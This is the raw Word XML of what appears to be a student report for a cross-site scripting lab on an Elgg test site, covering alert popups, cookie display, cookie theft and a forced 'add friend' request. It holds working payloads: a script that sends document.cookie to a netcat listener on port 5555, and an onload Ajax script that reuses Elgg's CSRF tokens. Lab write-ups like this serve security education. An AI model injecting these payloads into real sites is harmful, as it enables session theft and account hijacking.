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031F0F" w14:textId="6CB62304" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="00D84BB3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EBB394" w14:textId="47E6F2F3" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="00D84BB3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B22DCBC" wp14:editId="6F780F80">
            <wp:extent cx="5943600" cy="1618615"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="2052340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406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95B6" w14:textId="66994AC5" w:rsidR="007472A0" w:rsidRPr="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21D657BC" wp14:editId="36F09DEA">
            <wp:extent cx="5353050" cy="2238375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13385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89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B2CD" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="6001B8AE" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="2D6CF714" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="2C682A38" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="32CA8842" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="2F519279" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="5B61E1D7" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="11DE141C" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="59DBBD50" w14:textId="77777777" w:rsidR="007472A0" w:rsidRPr="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="777757F8" w14:textId="390794FE" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00D84BB3">
        <w:lastRenderedPageBreak/>
        <w:t>Task 1: Posting a Malicious Message to Display an Alert Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFAF3B2" w14:textId="77777777" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3"/>
    <w:p w14:paraId="7A57F673" w14:textId="3FA2FF92" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB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3A35960" wp14:editId="27F9D5FF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1554480</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2026920" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="1143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EE615F" w14:textId="172FE77C" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00D84BB3">
                              <w:t>&lt;script&gt;alert(</w:t>
                            </w:r>
                            <w:r>
                              <w:t>‘</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00D84BB3">
                              <w:t>XSS</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>’</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00D84BB3">
                              <w:t>);&lt;</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00D84BB3">
                              <w:t>/script&gt;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A3596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2.4pt;margin-top:23.4pt;width:159.6pt;height:2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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4BEE615F" w14:textId="172FE77C" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00D84BB3">
                        <w:t>&lt;script&gt;alert(</w:t>
                      </w:r>
                      <w:r>
                        <w:t>‘</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00D84BB3">
                        <w:t>XSS</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>’</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00D84BB3">
                        <w:t>);&lt;</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00D84BB3">
                        <w:t>/script&gt;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JS Script-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499500B4" w14:textId="09E8B637" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3"/>
    <w:p w14:paraId="4DBA90C5" w14:textId="77777777" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3"/>
    <w:p w14:paraId="77D33589" w14:textId="4EB99BA9" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41957D5C" wp14:editId="1EF6F988">
            <wp:extent cx="3190875" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="31658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850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829B" w14:textId="7B25F1C3" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79B8B2B5" wp14:editId="3DACC71C">
            <wp:extent cx="4619625" cy="2771775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="167219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932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3683" w14:textId="77777777" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3"/>
    <w:p w14:paraId="4B7E2AA7" w14:textId="469E1139" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3"/>
    <w:p w14:paraId="66E018DF" w14:textId="77777777" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3"/>
    <w:p w14:paraId="4132584E" w14:textId="7BCE9D5F" w:rsidR="00D84BB3" w:rsidRDefault="00D84BB3" w:rsidP="00D84BB3"/>
    <w:p w14:paraId="2BEAACBB" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="00D84BB3"/>
    <w:p w14:paraId="04180CFF" w14:textId="0790E91B" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="007472A0">
        <w:lastRenderedPageBreak/>
        <w:t>Task 2: Posting a Malicious Message to Display Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71205C7E" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="11C4E025" w14:textId="56905348" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0">
      <w:r>
        <w:t>JS Script-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B60B6F3" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="4C519991" w14:textId="0657A4FA" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A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7E4A28D" wp14:editId="3579ACAB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>891540</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>64135</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2750820" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="11430" b="19050"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="7591350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082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2F371D" w14:textId="77777777" w:rsidR="007472A0" w:rsidRPr="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0">
                            <w:r w:rsidRPr="007472A0">
                              <w:t>&lt;script&gt;alert(</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="007472A0">
                              <w:t>document.cookie</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="007472A0">
                              <w:t>);&lt;/script&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="717D2C49" w14:textId="0E844FF4" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="00747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4A28D" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:70.2pt;margin-top:5.05pt;width:216.6pt;height:2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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="542F371D" w14:textId="77777777" w:rsidR="007472A0" w:rsidRPr="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0">
                      <w:r w:rsidRPr="007472A0">
                        <w:t>&lt;script&gt;alert(</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="007472A0">
                        <w:t>document.cookie</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="007472A0">
                        <w:t>);&lt;/script&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="717D2C49" w14:textId="0E844FF4" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0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1078943" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="610F07B8" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="7F685FA6" w14:textId="76C0E95E" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61C5B9ED" wp14:editId="797A9FD2">
            <wp:extent cx="4533900" cy="1685925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="211146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698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AC74" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="15BA1EBC" w14:textId="0338E333" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3870C82F" wp14:editId="739B235E">
            <wp:extent cx="5943600" cy="1694815"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="164301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140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40A8" w14:textId="77777777" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0"/>
    <w:p w14:paraId="45253BC1" w14:textId="124BD70D" w:rsidR="007472A0" w:rsidRDefault="007472A0" w:rsidP="007472A0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="007472A0">
        <w:t>Task 3: Stealing Cookies from the Victim’s Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CF05A1" w14:textId="54A6C9BE" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B0256F">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B0256F">
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B0256F">
        <w:t>(`&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B0256F">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B0256F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r w:rsidRPr="00B0256F">
        <w:t>rc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B0256F">
        <w:t>=http://127.0.0.1:5555?c=`+escape(document.cookie)+'&gt;');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7C0D8C" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F256DC" w14:textId="4B4D8A75" w:rsidR="00B0256F" w:rsidRPr="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B0256F">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B0256F">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00B0256F">
        <w:t xml:space="preserve"> 5555 -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636AEF81" w14:textId="46F9553B" w:rsidR="007472A0" w:rsidRDefault="00B0256F" w:rsidP="007472A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66479C3C" wp14:editId="59ECC7EC">
            <wp:extent cx="5943600" cy="1009015"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1494511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117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0BAF" w14:textId="3FC29010" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="007472A0"/>
    <w:p w14:paraId="485E6C01" w14:textId="2F770DE9" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
      <w:pPr>
        <w:pStyle w:val="Heading1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19690BA" wp14:editId="054452F6">
            <wp:simplePos x="914400" y="2057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572385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="163879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9533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2DAB1" w14:textId="01D0B434" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00B0256F">
        <w:t>Task 4: Becoming the Victim’s Friend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC33836" w14:textId="221DDCC4" w:rsidR="00892138" w:rsidRDefault="00892138" w:rsidP="00892138">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EAB1860" wp14:editId="12ED3636">
            <wp:extent cx="5943600" cy="2132965"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="127427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796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9396" w14:textId="3F0C7F7B" w:rsidR="00892138" w:rsidRDefault="00892138" w:rsidP="00892138">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D8357E4" wp14:editId="5405966B">
            <wp:extent cx="5943600" cy="1244600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36559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988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BFDD" w14:textId="043DBFEF" w:rsidR="00892138" w:rsidRPr="00892138" w:rsidRDefault="00892138" w:rsidP="00892138">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FF8F10A" wp14:editId="3128B8C4">
            <wp:extent cx="4810735" cy="2712720"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="212981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193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2852" cy="271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979B" w14:textId="17E735BE" w:rsidR="00892138" w:rsidRPr="00892138" w:rsidRDefault="00892138" w:rsidP="00892138">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C056EA0" wp14:editId="033DD2BD">
            <wp:extent cx="5943600" cy="2835910"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="126882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202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3AEA" w14:textId="77777777" w:rsidR="00892138" w:rsidRDefault="00892138" w:rsidP="00B0256F"/>
    <w:p w14:paraId="4ACB38C5" w14:textId="02450429" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256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D6B9D0F" wp14:editId="15F353BD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>281305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5737860" cy="2910840"/>
                <wp:effectExtent l="0" t="0" r="15240" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="7832958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7860" cy="291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45D4E5" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>&lt;script type="text/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>javascript</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>"&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="140546C9" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F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window.onload</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> = function () {</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="29794E95" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>var Ajax=null;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2DC8817F" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">var </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>ts</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>="&amp;__</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>elgg_ts</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>="+</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>elgg.security</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t>.</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>token._</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t>_</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>elgg_ts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01CB70A" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>var token="&amp;__</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>elgg_token</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>="+</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>elgg.security</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t>.</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>token._</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t>_</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>elgg_token</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5AC338C1" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44"+ts+token; </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="587188DB" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Ajax=new </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>XMLHttpRequest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169C1161" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Ajax.open</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>("GET</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>",</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>sendurl</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t>,true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C536537" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Ajax.setRequestHeader</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>("Host","www.xsslabelgg.com");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="265EEAEA" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2266D745" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Ajax.send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5E5D37C0" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1558F7C8" w14:textId="393097BE" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                            <w:pPr>
                              <w:spacing w:after="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>&lt;/script&gt;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B9D0F" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:22.15pt;width:451.8pt;height:229.2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dtQFgIAACc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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6A45D4E5" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>&lt;script type="text/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>javascript</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>"&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="140546C9" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F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window.onload</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> = function () {</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="29794E95" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>var Ajax=null;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2DC8817F" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">var </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>ts</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>="&amp;__</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>elgg_ts</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>="+</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>elgg.security</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>token._</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t>_</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>elgg_ts</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="001CB70A" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t>var token="&amp;__</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>elgg_token</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>="+</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>elgg.security</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t>.</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>token._</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t>_</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>elgg_token</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">; </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5AC338C1" w14:textId="77777777" w:rsidR="00B0256F" w:rsidRDefault="00B0256F" w:rsidP="00B0256F">
                      <w:pPr>
                        <w:spacing w:after="0"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44"+ts+token; </w:t>
                      </w:r>
                    </w:p>
